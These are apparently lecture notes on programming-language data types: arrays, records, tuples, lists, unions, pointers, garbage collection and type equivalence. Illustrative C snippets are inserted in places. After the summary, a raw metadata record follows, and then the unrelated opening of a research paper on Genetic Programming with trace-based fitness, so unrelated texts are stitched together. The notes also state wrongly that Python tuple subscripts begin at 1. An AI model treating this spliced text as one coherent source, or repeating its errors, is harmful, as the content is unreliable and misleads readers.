Evaluation of Enumerated Type • Aid to readability, e.g., no need to code a color as a number • Aid to reliability, e.g., compiler can check: – operations (don’t allow colors to be added) – No enumeration variable can be assigned a value outside its defined range – Ada, C#, and Java 5.0 provide better support for enumeration than C++ because enumeration type variables in these languages are not coerced into integer types Subrange Types • An ordered contiguous subsequence of an ordinal type – Example: 12..18 is a subrange of integer type • Ada’s design ``` type Days is (mon, tue, wed, thu, fri, sat, sun); subtype Weekdays is Days range mon..fri; subtype Index is Integer range 1..100; Day1: Days; Day2: Weekday; Day2 := Day1; ``` Subrange Evaluation • Aid to readability – Make it clear to the readers that variables of subrange can store only certain range of values • Reliability – Assigning a value to a subrange variable that is outside the specified range is detected as an error Implementation of User-Defined Ordinal Types - Enumeration types are implemented as integers - Subrange types are implemented like the parent types with code inserted (by the compiler) to restrict assignments to subrange variables Array Types • An array is a homogeneous aggregate of data elements in which an individual element is identified by its position in the aggregate, relative to the first element. Array Design Issues - What types are legal for subscripts? - Are subscripting expressions in element references range checked? - When are subscript ranges bound? - When does allocation take place? - Are ragged or rectangular multidimensional arrays allowed, or both? - What is the maximum number of subscripts? - Can array objects be initialized? - Are any kind of slices supported? 
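To make these design questions concrete, the following illustrative C snippet (not part of the chapter) shows how C happens to answer three of them: subscripts are integer-valued, array objects can be initialized at declaration, and subscript expressions are not range checked.

```c
#include <stdio.h>

int main(void) {
    int list[4] = {4, 5, 7, 83};   /* initialization at declaration is allowed */

    int i = 2;                     /* subscript type: integer */
    printf("%d\n", list[i]);       /* prints 7 */

    /* No range checking is required by C: list[10] would compile,
     * but evaluating it is undefined behavior, so we avoid it here. */
    return 0;
}
```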
Array Indexing • *Indexing* (or subscripting) is a mapping from indices to elements \[ \text{array\_name (index\_value\_list)} \rightarrow \text{an element} \] • **Index Syntax** – Fortran and Ada use parentheses • Ada explicitly uses parentheses to show uniformity between array references and function calls because both are *mappings* – Most other languages use brackets Arrays Index (Subscript) Types - FORTRAN, C: integer only - Ada: integer or enumeration (includes Boolean and char) - Java: integer types only - Index range checking - C, C++, Perl, and Fortran do not specify range checking - Java, ML, C# specify range checking - In Ada, the default is to require range checking, but it can be turned off Subscript Binding and Array Categories - **Static**: subscript ranges are statically bound and storage allocation is static (before run-time) - Advantage: efficiency (no dynamic allocation) - **Fixed stack-dynamic**: subscript ranges are statically bound, but the allocation is done at declaration time - Advantage: space efficiency Subscript Binding and Array Categories (continued) - **Stack-dynamic**: subscript ranges are dynamically bound and the storage allocation is dynamic (done at run-time) - Advantage: flexibility (the size of an array need not be known until the array is to be used) - **Fixed heap-dynamic**: similar to fixed stack-dynamic: storage binding is dynamic but fixed after allocation (i.e., binding is done when requested and storage is allocated from heap, not stack) Subscript Binding and Array Categories (continued) • Heap-dynamic: binding of subscript ranges and storage allocation is dynamic and can change any number of times – Advantage: flexibility (arrays can grow or shrink during program execution) Subscript Binding and Array Categories (continued) • C and C++ arrays that include `static` modifier are static • C and C++ arrays without `static` modifier are fixed stack-dynamic • C and C++ provide fixed heap-dynamic arrays • C# includes a second array class `ArrayList` that provides fixed heap-dynamic • Perl, JavaScript, Python, and Ruby support heap-dynamic arrays Array Initialization - Some languages allow initialization at the time of storage allocation - C, C++, Java, C# example ``` int list [] = {4, 5, 7, 83} ``` - Character strings in C and C++ ``` char name [] = "freddie"; ``` - Arrays of strings in C and C++ ``` char *names [] = {"Bob", "Jake", "Joe"}; ``` - Java initialization of String objects ``` String[] names = {"Bob", "Jake", "Joe"}; ``` Heterogeneous Arrays • A *heterogeneous array* is one in which the elements need not be of the same type • Supported by Perl, Python, JavaScript, and Ruby Array Initialization • C-based languages - `int list [] = {1, 3, 5, 7}` - `char *names [] = {"Mike", "Fred", "Mary Lou"};` • Ada - `List : array (1..5) of Integer := (1 => 17, 3 => 34, others => 0);` • Python - `List comprehensions` ```python list = [x ** 2 for x in range(12) if x % 3 == 0] puts [0, 9, 36, 81] in list ``` Arrays Operations - APL provides the most powerful array processing operations for vectors and matrixes as well as unary operators (for example, to reverse column elements) - Ada allows array assignment but also catenation - Python’s array assignments, but they are only reference changes. 
Python also supports array catenation and element membership operations - Ruby also provides array catenation - Fortran provides *elemental* operations because they are between pairs of array elements - For example, the + operator between two arrays results in an array of the sums of the element pairs of the two arrays Rectangular and Jagged Arrays • A rectangular array is a multi-dimensioned array in which all of the rows have the same number of elements and all columns have the same number of elements • A jagged matrix has rows with a varying number of elements – Possible when multi-dimensioned arrays actually appear as arrays of arrays • C, C++, and Java support jagged arrays • Fortran, Ada, and C# support rectangular arrays (C# also supports jagged arrays) Slices • A slice is some substructure of an array; nothing more than a referencing mechanism • Slices are only useful in languages that have array operations Slice Examples • Python: `vector = [2, 4, 6, 8, 10, 12, 14, 16]`; `mat = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]`; `vector[3:6]` is a three-element array; `mat[0][0:2]` is the first and second element of the first row of mat • Ruby supports slices with the `slice` method: `list.slice(2, 2)` returns the third and fourth elements of list Implementation of Arrays • Access function maps subscript expressions to an address in the array • Access function for single-dimensioned arrays:

\[ \text{address}(\text{list}[k]) = \text{address}(\text{list}[\text{lower\_bound}]) + (k - \text{lower\_bound}) \times \text{element\_size} \]

Accessing Multi-dimensioned Arrays • Two common ways: – Row major order (by rows) – used in most languages – Column major order (by columns) – used in Fortran – A compile-time descriptor for a multidimensional array Locating an Element in a Multi-dimensioned Array • General format (row major order, where \( n \) is the number of elements per row):

\[ \text{location}(a[i,j]) = \text{address}(a[\text{row}_{lb}, \text{col}_{lb}]) + \left( (i - \text{row}_{lb}) \times n + (j - \text{col}_{lb}) \right) \times \text{element\_size} \]

## Compile-Time Descriptors

<table>
<thead>
<tr>
<th>Single-dimensioned array descriptor</th>
<th>Multidimensional array descriptor</th>
</tr>
</thead>
<tbody>
<tr><td>Array</td><td>Multidimensioned array</td></tr>
<tr><td>Element type</td><td>Element type</td></tr>
<tr><td>Index type</td><td>Index type</td></tr>
<tr><td>Index lower bound</td><td>Number of dimensions</td></tr>
<tr><td>Index upper bound</td><td>Index range 1</td></tr>
<tr><td>Address</td><td>...</td></tr>
<tr><td></td><td>Index range n</td></tr>
<tr><td></td><td>Address</td></tr>
</tbody>
</table>

Associative Arrays • An *associative array* is an unordered collection of data elements that are indexed by an equal number of values called *keys* – User-defined keys must be stored • Design issues: - What is the form of references to elements? - Is the size static or dynamic? • Built-in type in Perl, Python, Ruby, and Lua – In Lua, they are supported by tables Associative Arrays in Perl • Names begin with %; literals are delimited by parentheses

```perl
%hi_temps = ("Mon" => 77, "Tue" => 79, "Wed" => 65, ...);
```

• Subscripting is done using braces and keys

```perl
$hi_temps{"Wed"} = 83;
```

– Elements can be removed with delete

```perl
delete $hi_temps{"Tue"};
```

Record Types - A *record* is a possibly heterogeneous aggregate of data elements in which the individual elements are identified by names. - Design issues: - What is the syntactic form of references to the field? - Are elliptical references allowed?
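Returning to the access functions given under "Implementation of Arrays" above, the following C sketch (illustrative only; it assumes row-major order and zero lower bounds) computes element offsets the way a compiler-generated access function would.

```c
#include <stdio.h>

/* Offset of list[k] for a one-dimensional array with lower bound lb. */
size_t offset_1d(size_t k, size_t lb, size_t element_size) {
    return (k - lb) * element_size;
}

/* Offset of a[i][j] for a row-major array with n columns and lower bounds 0. */
size_t offset_2d(size_t i, size_t j, size_t n, size_t element_size) {
    return (i * n + j) * element_size;
}

int main(void) {
    /* For list[5] the offset is 5 * sizeof(int); for a[2][1] in a 3 x 4 array
     * it is (2*4 + 1) * sizeof(int), i.e. 20 and 36 on a 4-byte-int machine. */
    printf("%zu %zu\n", offset_1d(5, 0, sizeof(int)), offset_2d(2, 1, 4, sizeof(int)));
    return 0;
}
```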
Definition of Records in COBOL • COBOL uses level numbers to show nested records; others use recursive definition 01 EMP-REC. 02 EMP-NAME. 05 FIRST PIC X(20). 05 MID PIC X(10). 05 LAST PIC X(20). 02 HOURLY-RATE PIC 99V99. Definition of Records in Ada • Record structures are indicated in an orthogonal way ```ada type Emp_Rec_Type is record First: String (1..20); Mid: String (1..10); Last: String (1..20); Hourly_Rate: Float; end record; Emp_Rec: Emp_Rec_Type; ``` References to Records • Record field references 1. COBOL field_name OF record_name_1 OF ... OF record_name_n 2. Others (dot notation) record_name_1.record_name_2. ... record_name_n.field_name • Fully qualified references must include all record names • Elliptical references allow leaving out record names as long as the reference is unambiguous, for example in COBOL FIRST, FIRST OF EMP-NAME, and FIRST of EMP-REC are elliptical references to the employee’s first name Operations on Records • Assignment is very common if the types are identical • Ada allows record comparison • Ada records can be initialized with aggregate literals • COBOL provides MOVE CORRESPONDING – Copies a field of the source record to the corresponding field in the target record Evaluation and Comparison to Arrays • Records are used when collection of data values is heterogeneous • Access to array elements is much slower than access to record fields, because subscripts are dynamic (field names are static) • Dynamic subscripts could be used with record field access, but it would disallow type checking and it would be much slower Implementation of Record Type Offset address relative to the beginning of the records is associated with each field <table> <thead> <tr> <th>Field 1</th> <th>Field n</th> </tr> </thead> <tbody> <tr> <td>Record</td> <td>Record</td> </tr> <tr> <td>Name</td> <td>Name</td> </tr> <tr> <td>Type</td> <td>Type</td> </tr> <tr> <td>Offset</td> <td>Offset</td> </tr> <tr> <td></td> <td>Name</td> </tr> <tr> <td></td> <td>Type</td> </tr> <tr> <td></td> <td>Offset</td> </tr> <tr> <td></td> <td>Address</td> </tr> </tbody> </table> Tuple Types • A tuple is a data type that is similar to a record, except that the elements are not named • Used in Python, ML, and F# to allow functions to return multiple values – Python • Closely related to its lists, but immutable • Create with a tuple literal myTuple = (3, 5.8, 'apple') Referenced with subscripts (begin at 1) Catenation with + and deleted with del Tuple Types (continued) - ML ```ml val myTuple = (3, 5.8, 'apple'); ``` - Access as follows: ```ml #1(myTuple) is the first element ``` - A new tuple type can be defined ```ml type intReal = int * real; ``` - F# ```fsharp let tup = (3, 5, 7) ``` ```fsharp let a, b, c = tup ``` This assigns a tuple to a tuple pattern `(a, b, c)` List Types • Lists in LISP and Scheme are delimited by parentheses and use no commas (A B C D) and (A (B C) D) • Data and code have the same form As data, (A B C) is literally what it is As code, (A B C) is the function A applied to the parameters B and C • The interpreter needs to know which a list is, so if it is data, we quote it with an apostrophe ’ (A B C) is data List Types (continued) - **List Operations in Scheme** - **CAR** returns the first element of its list parameter (CAR '(A B C)) returns A - **CDR** returns the remainder of its list parameter after the first element has been removed (CDR '(A B C)) returns (B C) - **CONS** puts its first parameter into its second parameter, a list, to make a new list (CONS 'A (B C)) returns (A B 
C) - **LIST** returns a new list of its parameters (LIST 'A 'B '(C D)) returns (A B (C D)) List Types (continued) • List Operations in ML – Lists are written in brackets and the elements are separated by commas – List elements must be of the same type – The Scheme `CONS` function is a binary operator in ML, `::` 3 :: [5, 7, 9] evaluates to [3, 5, 7, 9] – The Scheme `CAR` and `CDR` functions are named `hd` and `tl`, respectively List Types (continued) • F# Lists – Like those of ML, except elements are separated by semicolons and `hd` and `tl` are methods of the `List` class • Python Lists – The list data type also serves as Python's arrays – Unlike Scheme, Common LISP, ML, and F#, Python's lists are mutable – Elements can be of any type – Create a list with an assignment: `myList = [3, 5.8, "grape"]` List Types (continued) - Python Lists (continued) - List elements are referenced with subscripting, with indices beginning at zero: `x = myList[1]` sets x to 5.8 - List elements can be deleted with `del`: `del myList[1]` - List Comprehensions – derived from set notation: `[x * x for x in range(12) if x % 3 == 0]` range(12) creates [0, 1, 2, ..., 11] Constructed list: [0, 9, 36, 81] List Types (continued) - Haskell's List Comprehensions - The original: `[n * n | n <- [1..10]]` - F#'s List Comprehensions

```fsharp
let myArray = [|for i in 1 .. 5 -> i * i|]
```

- Both C# and Java support lists through their generic heap-dynamic collection classes, List and ArrayList, respectively Union Types • A *union* is a type whose variables are allowed to store different type values at different times during execution • Design issues – Should type checking be required? – Should unions be embedded in records? Discriminated vs. Free Unions • Fortran, C, and C++ provide union constructs in which there is no language support for type checking; the union in these languages is called *free union* • Type checking of unions requires that each union include a type indicator called a *discriminant* – Supported by Ada Ada Union Types

```ada
type Shape is (Circle, Triangle, Rectangle);
type Colors is (Red, Green, Blue);
type Figure (Form: Shape) is record
   Filled: Boolean;
   Color: Colors;
   case Form is
      when Circle => Diameter: Float;
      when Triangle => Leftside, Rightside: Integer;
                       Angle: Float;
      when Rectangle => Side1, Side2: Integer;
   end case;
end record;
```

Ada Union Type Illustrated A discriminated union of three shape variables Implementation of Unions type Node (Tag : Boolean) is record case Tag is when True => Count : Integer; when False => Sum : Float; end case; end record; Evaluation of Unions • Free unions are unsafe – Do not allow type checking • Java and C# do not support unions – Reflective of growing concerns for safety in programming languages • Ada's discriminated unions are safe Pointer and Reference Types • A *pointer* type variable has a range of values that consists of memory addresses and a special value, *nil* • Provide the power of indirect addressing • Provide a way to manage dynamic memory • A pointer can be used to access a location in the area where storage is dynamically created (usually called a *heap*) Design Issues of Pointers • What are the scope of and lifetime of a pointer variable? • What is the lifetime of a heap-dynamic variable?
• Are pointers restricted as to the type of value to which they can point? • Are pointers used for dynamic storage management, indirect addressing, or both? • Should the language support pointer types, reference types, or both? Pointer Operations • Two fundamental operations: assignment and dereferencing • Assignment is used to set a pointer variable’s value to some useful address • Dereferencing yields the value stored at the location represented by the pointer’s value – Dereferencing can be explicit or implicit – C++ uses an explicit operation via * \[ j = *ptr \] sets \( j \) to the value located at \( ptr \) Pointer Assignment Illustrated The assignment operation \( j = *\text{ptr} \) Problems with Pointers • Dangling pointers (dangerous) – A pointer points to a heap-dynamic variable that has been deallocated • Lost heap-dynamic variable – An allocated heap-dynamic variable that is no longer accessible to the user program (often called garbage) • Pointer p1 is set to point to a newly created heap-dynamic variable • Pointer p1 is later set to point to another newly created heap-dynamic variable • The process of losing heap-dynamic variables is called memory leakage Pointers in Ada • Some dangling pointers are disallowed because dynamic objects can be automatically deallocated at the end of pointer's type scope • The lost heap-dynamic variable problem is not eliminated by Ada (possible with UNCHECKED_DEALLOCATION) Pointers in C and C++ • Extremely flexible but must be used with care • Pointers can point at any variable regardless of when or where it was allocated • Used for dynamic storage management and addressing • Pointer arithmetic is possible • Explicit dereferencing and address-of operators • Domain type need not be fixed (void *) void * can point to any type and can be type checked (cannot be de-referenced) Pointer Arithmetic in C and C++ ```c float stuff[100]; float *p; p = stuff; *(p+5) is equivalent to stuff[5] and p[5] *(p+i) is equivalent to stuff[i] and p[i] ``` Reference Types • C++ includes a special kind of pointer type called a reference type that is used primarily for formal parameters – Advantages of both pass-by-reference and pass-by-value • Java extends C++’s reference variables and allows them to replace pointers entirely – References are references to objects, rather than being addresses • C# includes both the references of Java and the pointers of C++ Evaluation of Pointers • Dangling pointers and dangling objects are problems as is heap management • Pointers are like goto's--they widen the range of cells that can be accessed by a variable • Pointers or references are necessary for dynamic data structures--so we can't design a language without them Representations of Pointers • Large computers use single values • Intel microprocessors use segment and offset Dangling Pointer Problem • *Tombstone*: extra heap cell that is a pointer to the heap-dynamic variable – The actual pointer variable points only at tombstones – When heap-dynamic variable de-allocated, tombstone remains but set to nil – Costly in time and space . *Locks-and-keys*: Pointer values are represented as (key, address) pairs – Heap-dynamic variables are represented as variable plus cell for integer lock value – When heap-dynamic variable allocated, lock value is created and placed in lock cell and key cell of pointer Heap Management • A very complex run-time process • Single-size cells vs. 
variable-size cells • Two approaches to reclaim garbage – Reference counters (*eager approach*): reclamation is gradual – Mark-sweep (*lazy approach*): reclamation occurs when the list of variable space becomes empty Reference Counter • Reference counters: maintain a counter in every cell that store the number of pointers currently pointing at the cell – Disadvantages: space required, execution time required, complications for cells connected circularly – Advantage: it is intrinsically incremental, so significant delays in the application execution are avoided Mark-Sweep • The run-time system allocates storage cells as requested and disconnects pointers from cells as necessary; mark-sweep then begins – Every heap cell has an extra bit used by collection algorithm – All cells initially set to garbage – All pointers traced into heap, and reachable cells marked as not garbage – All garbage cells returned to list of available cells – Disadvantages: in its original form, it was done too infrequently. When done, it caused significant delays in application execution. Contemporary mark-sweep algorithms avoid this by doing it more often—called incremental mark-sweep Marking Algorithm Dashed lines show the order of node_marking Variable-Size Cells • All the difficulties of single-size cells plus more • Required by most programming languages • If mark-sweep is used, additional problems occur – The initial setting of the indicators of all cells in the heap is difficult – The marking process in nontrivial – Maintaining the list of available space is another source of overhead Type Checking • Generalize the concept of operands and operators to include subprograms and assignments • *Type checking* is the activity of ensuring that the operands of an operator are of compatible types • A *compatible type* is one that is either legal for the operator, or is allowed under language rules to be implicitly converted, by compiler-generated code, to a legal type – This automatic conversion is called a *coercion*. • A *type error* is the application of an operator to an operand of an inappropriate type Type Checking (continued) - If all type bindings are static, nearly all type checking can be static. - If type bindings are dynamic, type checking must be dynamic. - A programming language is *strongly typed* if type errors are always detected. - **Advantage of strong typing**: allows the detection of the misuses of variables that result in type errors. Strong Typing Language examples: – C and C++ are not: parameter type checking can be avoided; unions are not type checked – Ada is, almost *(UNCHECKED CONVERSION is loophole)* (Java and C# are similar to Ada) Strong Typing (continued) • Coercion rules strongly affect strong typing—they can weaken it considerably (C++ versus Ada) • Although Java has just half the assignment coercions of C++, its strong typing is still far less effective than that of Ada Name Type Equivalence - *Name type equivalence* means the two variables have equivalent types if they are in either the same declaration or in declarations that use the same type name. - Easy to implement but highly restrictive: - Subranges of integer types are not equivalent with integer types. - Formal parameters must be the same type as their corresponding actual parameters. 
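C's treatment of struct types gives a concrete (illustrative) feel for name type equivalence: two separately declared struct types are incompatible even when their members are identical, whereas a `typedef` merely introduces a new name for the same type.

```c
#include <stdio.h>

struct celsius    { double value; };
struct fahrenheit { double value; };   /* identical structure, different name */

typedef struct celsius temp_c;         /* alias: the same type as struct celsius */

int main(void) {
    struct celsius a = { 21.5 };
    temp_c b = a;                      /* OK: the typedef names the same type */

    /* struct fahrenheit c = a;        -- rejected by the compiler: the types
                                          are incompatible despite identical structure */

    printf("%.1f\n", b.value);         /* prints 21.5 */
    return 0;
}
```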
Structure Type Equivalence - *Structure type equivalence* means that two variables have equivalent types if their types have identical structures - More flexible, but harder to implement Type Equivalence (continued) • Consider the problem of two structured types: – Are two record types equivalent if they are structurally the same but use different field names? – Are two array types equivalent if they are the same except that the subscripts are different? (e.g. [1..10] and [0..9]) – Are two enumeration types equivalent if their components are spelled differently? – With structural type equivalence, you cannot differentiate between types of the same structure (e.g. different units of speed, both float) Theory and Data Types • Type theory is a broad area of study in mathematics, logic, computer science, and philosophy • Two branches of type theory in computer science: – Practical – data types in commercial languages – Abstract – typed lambda calculus • A type system is a set of types and the rules that govern their use in programs Theory and Data Types (continued) • Formal model of a type system is a set of types and a collection of functions that define the type rules – Either an attribute grammar or a type map could be used for the functions – Finite mappings – model arrays and functions – Cartesian products – model tuples and records – Set unions – model union types – Subsets – model subtypes Summary • The data types of a language are a large part of what determines that language’s style and usefulness • The primitive data types of most imperative languages include numeric, character, and Boolean types • The user-defined enumeration and subrange types are convenient and add to the readability and reliability of programs • Arrays and records are included in most languages • Pointers are used for addressing flexibility and to control dynamic storage management
{"Source-Url": "https://www.cs.montana.edu/courses/csci305/notes/chapter6.pdf", "len_cl100k_base": 7457, "olmocr-version": "0.1.50", "pdf-total-pages": 92, "total-fallback-pages": 0, "total-input-tokens": 123583, "total-output-tokens": 10746, "length": "2e12", "weborganizer": {"__label__adult": 0.0002963542938232422, "__label__art_design": 0.00023877620697021484, "__label__crime_law": 0.00021517276763916016, "__label__education_jobs": 0.00045228004455566406, "__label__entertainment": 4.357099533081055e-05, "__label__fashion_beauty": 0.00010877847671508788, "__label__finance_business": 0.00010544061660766602, "__label__food_dining": 0.00030159950256347656, "__label__games": 0.0003437995910644531, "__label__hardware": 0.0006384849548339844, "__label__health": 0.00031948089599609375, "__label__history": 0.0001857280731201172, "__label__home_hobbies": 6.628036499023438e-05, "__label__industrial": 0.00027871131896972656, "__label__literature": 0.00021088123321533203, "__label__politics": 0.00019252300262451172, "__label__religion": 0.00040435791015625, "__label__science_tech": 0.00611114501953125, "__label__social_life": 6.908178329467773e-05, "__label__software": 0.00435638427734375, "__label__software_dev": 0.984375, "__label__sports_fitness": 0.0002310276031494141, "__label__transportation": 0.0003452301025390625, "__label__travel": 0.0001577138900756836}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 30132, 0.00886]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 30132, 0.86975]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 30132, 0.85144]], "google_gemma-3-12b-it_contains_pii": [[0, 22, false], [22, 328, null], [328, 685, null], [685, 1000, null], [1000, 1241, null], [1241, 1532, null], [1532, 1806, null], [1806, 2060, null], [2060, 2255, null], [2255, 2593, null], [2593, 2786, null], [2786, 2958, null], [2958, 3462, null], [3462, 3801, null], [3801, 4005, null], [4005, 4276, null], [4276, 4576, null], [4576, 4806, null], [4806, 5259, null], [5259, 5692, null], [5692, 6030, null], [6030, 6291, null], [6291, 6523, null], [6523, 6701, null], [6701, 7085, null], [7085, 7470, null], [7470, 7816, null], [7816, 8154, null], [8154, 8618, null], [8618, 8863, null], [8863, 9236, null], [9236, 9687, null], [9687, 9843, null], [9843, 10194, null], [10194, 10804, null], [10804, 11258, null], [11258, 11417, null], [11417, 11797, null], [11797, 12073, null], [12073, 12296, null], [12296, 12540, null], [12540, 13073, null], [13073, 13449, null], [13449, 13793, null], [13793, 14049, null], [14049, 14304, null], [14304, 14567, null], [14567, 15056, null], [15056, 15346, null], [15346, 15703, null], [15703, 16041, null], [16041, 16441, null], [16441, 16842, null], [16842, 17228, null], [17228, 17754, null], [17754, 18146, null], [18146, 18575, null], [18575, 19150, null], [19150, 19487, null], [19487, 19715, null], [19715, 20026, null], [20026, 20403, null], [20403, 20478, null], [20478, 20655, null], [20655, 20877, null], [20877, 21224, null], [21224, 21590, null], [21590, 21989, null], [21989, 22068, null], [22068, 22575, null], [22575, 22829, null], [22829, 23243, null], [23243, 23409, null], [23409, 23822, null], [23822, 24126, null], [24126, 24238, null], [24238, 24783, null], [24783, 25079, null], [25079, 25434, null], [25434, 26054, null], [26054, 26117, null], [26117, 26476, null], [26476, 27006, null], [27006, 27363, null], [27363, 27576, null], [27576, 27826, 
null], [27826, 28213, null], [28213, 28401, null], [28401, 28933, null], [28933, 29274, null], [29274, 29657, null], [29657, 30132, null]], "google_gemma-3-12b-it_is_public_document": [[0, 22, true], [22, 328, null], [328, 685, null], [685, 1000, null], [1000, 1241, null], [1241, 1532, null], [1532, 1806, null], [1806, 2060, null], [2060, 2255, null], [2255, 2593, null], [2593, 2786, null], [2786, 2958, null], [2958, 3462, null], [3462, 3801, null], [3801, 4005, null], [4005, 4276, null], [4276, 4576, null], [4576, 4806, null], [4806, 5259, null], [5259, 5692, null], [5692, 6030, null], [6030, 6291, null], [6291, 6523, null], [6523, 6701, null], [6701, 7085, null], [7085, 7470, null], [7470, 7816, null], [7816, 8154, null], [8154, 8618, null], [8618, 8863, null], [8863, 9236, null], [9236, 9687, null], [9687, 9843, null], [9843, 10194, null], [10194, 10804, null], [10804, 11258, null], [11258, 11417, null], [11417, 11797, null], [11797, 12073, null], [12073, 12296, null], [12296, 12540, null], [12540, 13073, null], [13073, 13449, null], [13449, 13793, null], [13793, 14049, null], [14049, 14304, null], [14304, 14567, null], [14567, 15056, null], [15056, 15346, null], [15346, 15703, null], [15703, 16041, null], [16041, 16441, null], [16441, 16842, null], [16842, 17228, null], [17228, 17754, null], [17754, 18146, null], [18146, 18575, null], [18575, 19150, null], [19150, 19487, null], [19487, 19715, null], [19715, 20026, null], [20026, 20403, null], [20403, 20478, null], [20478, 20655, null], [20655, 20877, null], [20877, 21224, null], [21224, 21590, null], [21590, 21989, null], [21989, 22068, null], [22068, 22575, null], [22575, 22829, null], [22829, 23243, null], [23243, 23409, null], [23409, 23822, null], [23822, 24126, null], [24126, 24238, null], [24238, 24783, null], [24783, 25079, null], [25079, 25434, null], [25434, 26054, null], [26054, 26117, null], [26117, 26476, null], [26476, 27006, null], [27006, 27363, null], [27363, 27576, null], [27576, 27826, null], [27826, 28213, null], [28213, 28401, null], [28401, 28933, null], [28933, 29274, null], [29274, 29657, null], [29657, 30132, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 30132, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 30132, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 30132, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 30132, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 30132, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 30132, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 30132, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 30132, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 30132, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, true], [5000, 30132, null]], "pdf_page_numbers": [[0, 22, 1], [22, 328, 2], [328, 685, 3], [685, 1000, 4], [1000, 1241, 5], [1241, 1532, 6], [1532, 1806, 7], [1806, 2060, 8], [2060, 2255, 9], [2255, 2593, 10], [2593, 2786, 11], [2786, 2958, 12], [2958, 3462, 13], [3462, 3801, 14], [3801, 4005, 15], [4005, 4276, 16], [4276, 4576, 17], [4576, 4806, 18], [4806, 5259, 19], [5259, 5692, 20], [5692, 6030, 21], [6030, 6291, 22], [6291, 6523, 23], [6523, 6701, 24], [6701, 7085, 25], [7085, 7470, 26], [7470, 7816, 27], [7816, 8154, 28], [8154, 8618, 29], [8618, 
8863, 30], [8863, 9236, 31], [9236, 9687, 32], [9687, 9843, 33], [9843, 10194, 34], [10194, 10804, 35], [10804, 11258, 36], [11258, 11417, 37], [11417, 11797, 38], [11797, 12073, 39], [12073, 12296, 40], [12296, 12540, 41], [12540, 13073, 42], [13073, 13449, 43], [13449, 13793, 44], [13793, 14049, 45], [14049, 14304, 46], [14304, 14567, 47], [14567, 15056, 48], [15056, 15346, 49], [15346, 15703, 50], [15703, 16041, 51], [16041, 16441, 52], [16441, 16842, 53], [16842, 17228, 54], [17228, 17754, 55], [17754, 18146, 56], [18146, 18575, 57], [18575, 19150, 58], [19150, 19487, 59], [19487, 19715, 60], [19715, 20026, 61], [20026, 20403, 62], [20403, 20478, 63], [20478, 20655, 64], [20655, 20877, 65], [20877, 21224, 66], [21224, 21590, 67], [21590, 21989, 68], [21989, 22068, 69], [22068, 22575, 70], [22575, 22829, 71], [22829, 23243, 72], [23243, 23409, 73], [23409, 23822, 74], [23822, 24126, 75], [24126, 24238, 76], [24238, 24783, 77], [24783, 25079, 78], [25079, 25434, 79], [25434, 26054, 80], [26054, 26117, 81], [26117, 26476, 82], [26476, 27006, 83], [27006, 27363, 84], [27363, 27576, 85], [27576, 27826, 86], [27826, 28213, 87], [28213, 28401, 88], [28401, 28933, 89], [28933, 29274, 90], [29274, 29657, 91], [29657, 30132, 92]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 30132, 0.03448]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
ae3f931fa0edaebbae0d04154a63f31cd672225d
ABSTRACT Online progress in search and optimization is often hindered by neutrality in the fitness landscape, when many genotypes map to the same fitness value. We propose a method for imposing a gradient on the fitness function of a metaheuristic (in this case, Genetic Programming) via a metric (Minimum Description Length) induced from patterns detected in the trajectory of program execution. These patterns are induced via a decision tree classifier. We apply this method to a range of integer and boolean-valued problems, significantly outperforming the standard approach. The method is conceptually straightforward and applicable to virtually any metaheuristic that can be appropriately instrumented. Categories and Subject Descriptors I.2.2 [Artificial Intelligence]: Automatic Programming; I.2.8 [Artificial Intelligence]: Problem Solving, Control Methods, and Search—Heuristic methods General Terms Algorithms, Design, Experimentation Keywords genetic programming, neutrality, program trace, MDL, Push 1. INTRODUCTION AND MOTIVATIONS A Genetic Programming (GP) task is defined by a set of input data (fitness cases) and the desired program output for each of them. A GP algorithm is expected to infer the program only from these training examples. This can be very hard. When the task is challenging, it may be difficult for the search process to `lift off', i.e. to make any progress. For instance, if exhibiting any nontrivial (non-constant) behavior leads to fitness deterioration, then it will locally pay off for a program in a population to return a constant output regardless of the input data. This problem is not as severe in domains in which program performance on each test is assessed quantitatively. An example of such a domain is symbolic regression, where the error committed by a program on each fitness case is a continuous value, and thus can change gradually. Unfortunately, for more typical programing tasks, tests are qualitative: a program either passes a test or not. Synthesizing Boolean functions, sorting programs etc., belong to this category. The key observation that motivates this study is that even programs which yield a completely useless output (meaning: output that does not match in any way the desired output) may produce some intermediate outcomes that can be relevant for solving the task. Take for instance the n-bit parity task. An initial part of program that correctly calculates the number of ones in half of the inputs (bits) provides a potentially useful capability. However, this partial outcome may be lost in the course of subsequent calculations carried out by the program, so that the ultimate output of the program is (for instance) the constant true. As a result, the program receives low fitness, and may not pass the selection process, so that its useful partial capability will be lost. In standard GP, such intermediate results are not taken into account, because there is no singular means for assessing the quality of partial (intermediate) results produced by a program, given only the specification of the entire task. This is similar to a reinforcement learning setting, in which the agents are usually rewarded only after the entire task has been solved (i.e. once the goal state has been reached). For instance, an agent learning to play a game receives rewards only for complete games — there is no direct feedback about the quality of individual moves. We postulate here that evaluation of partial program outcomes may yield better insight and is technically feasible. 
